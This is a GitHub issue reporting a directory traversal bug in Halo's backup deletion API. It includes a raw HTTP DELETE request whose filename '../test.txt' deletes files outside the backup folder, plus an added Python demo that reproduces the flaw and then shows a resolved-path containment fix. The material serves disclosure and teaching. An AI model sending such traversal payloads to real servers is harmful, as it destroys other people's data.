
An Arbitrary file deletion vulnerability in the backend #422

Closed · 5 tasks done
any-how opened this issue Dec 11, 2019 · 0 comments

Assignees: JohnNiang
Labels: kind/bug (Categorizes issue or PR as related to a bug), resolved, vulnerability (Vulnerability)

any-how commented Dec 11, 2019

I am sure I have checked

I want to apply
  • BUG feedback

There is a backup function in the backend. When we delete our backup files, we can delete any file on the system through directory traversal.

```http
DELETE /api/admin/backups/halo?filename=../test.txt HTTP/1.1
Host: xxx:8090
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Origin: http://xxxx:8090
Referer: http://xx/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

My backup file directory is /tmp/halo-backup/. The request above deletes the test.txt file in the /tmp directory.
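
The report above boils down to a user-controlled `filename` being joined onto the backup directory and unlinked without checking that the result still lies inside that directory. The following is an added illustration, written in Python for this page and not Halo's own (Java) code: it reproduces the unchecked delete against the `../test.txt` payload from the report, then shows a containment check that resolves the joined path (collapsing `..` and following symlinks) and refuses anything that is not a strict descendant of the backup root. The function names, the `halo-backup` directory layout and the sample files are assumptions constructed for the demo.

```python
"""Path-traversal file deletion: the reported behaviour next to a hardened check.

Added example, not Halo's code. Function names, the backup root and the
file layout below are assumptions made for this demonstration.
"""
import os
import tempfile
from pathlib import Path


class UnsafeFilename(ValueError):
    """Raised when a requested name would escape the backup directory."""


def resolve_backup_path(backup_root: Path, filename: str) -> Path:
    """Map a client-supplied name onto a file strictly inside backup_root.

    resolve() collapses '..' segments and follows symlinks, so neither
    '../test.txt' nor a symlink planted inside the backup directory can
    point the delete outside the root.
    """
    root = backup_root.resolve()
    # Path('/tmp/halo-backup') / '/etc/passwd' == Path('/etc/passwd'):
    # an absolute name replaces the root, so reject it before joining.
    if not filename or os.path.isabs(filename) or filename in (".", ".."):
        raise UnsafeFilename(filename)
    candidate = (root / filename).resolve()
    # Strict descendant only: the root itself is not a backup file, and
    # anything whose resolved parents do not include the root is outside it.
    if candidate == root or root not in candidate.parents:
        raise UnsafeFilename(filename)
    return candidate


def is_safe_name(backup_root: str, filename: str) -> bool:
    """Convenience predicate: does `filename` stay inside `backup_root`?"""
    try:
        resolve_backup_path(Path(backup_root), filename)
        return True
    except UnsafeFilename:
        return False


def delete_backup_vulnerable(backup_root: Path, filename: str) -> bool:
    """Mirrors the reported behaviour: join the name and unlink it blindly."""
    target = backup_root / filename
    if target.is_file():
        target.unlink()
        return True
    return False


def delete_backup_safe(backup_root: Path, filename: str) -> bool:
    """Same operation, performed only after the containment check passes."""
    target = resolve_backup_path(backup_root, filename)
    if target.is_file():
        target.unlink()
        return True
    return False


def demo() -> dict:
    """Constructed layout: <tmp>/halo-backup/halo.zip plus a sibling <tmp>/test.txt."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        backup_root = base / "halo-backup"
        backup_root.mkdir()
        (backup_root / "halo.zip").write_bytes(b"constructed backup archive")
        victim = base / "test.txt"
        victim.write_text("constructed victim file outside the backup dir")

        # The traversal payload from the report against the unchecked version.
        vuln_deleted = delete_backup_vulnerable(backup_root, "../test.txt")
        victim_survived_vuln = victim.exists()

        # Recreate the victim and replay the payload against the hardened version.
        victim.write_text("constructed victim file outside the backup dir")
        try:
            delete_backup_safe(backup_root, "../test.txt")
            safe_rejected = False
        except UnsafeFilename:
            safe_rejected = True
        victim_survived_safe = victim.exists()

        # A legitimate backup name still deletes through the hardened path.
        legit_deleted = delete_backup_safe(backup_root, "halo.zip")

        return {
            "vuln_deleted": vuln_deleted,
            "victim_survived_vuln": victim_survived_vuln,
            "safe_rejected": safe_rejected,
            "victim_survived_safe": victim_survived_safe,
            "legit_deleted": legit_deleted,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check is done on the fully resolved path rather than by scanning the string for `..`: a string filter misses encodings and symlink tricks, while comparing `candidate.parents` against the resolved root makes the decision on where the file actually is. Names that wander out and back in (for example `../halo-backup/halo.zip`) are accepted because they resolve inside the root, which is the correct outcome for a containment check.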

@JohnNiang JohnNiang added kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability labels Dec 11, 2019
@JohnNiang JohnNiang self-assigned this Dec 12, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* fix: moving menu team causes submenus to be lost

Signed-off-by: Ryan Wang <i@ryanc.cc>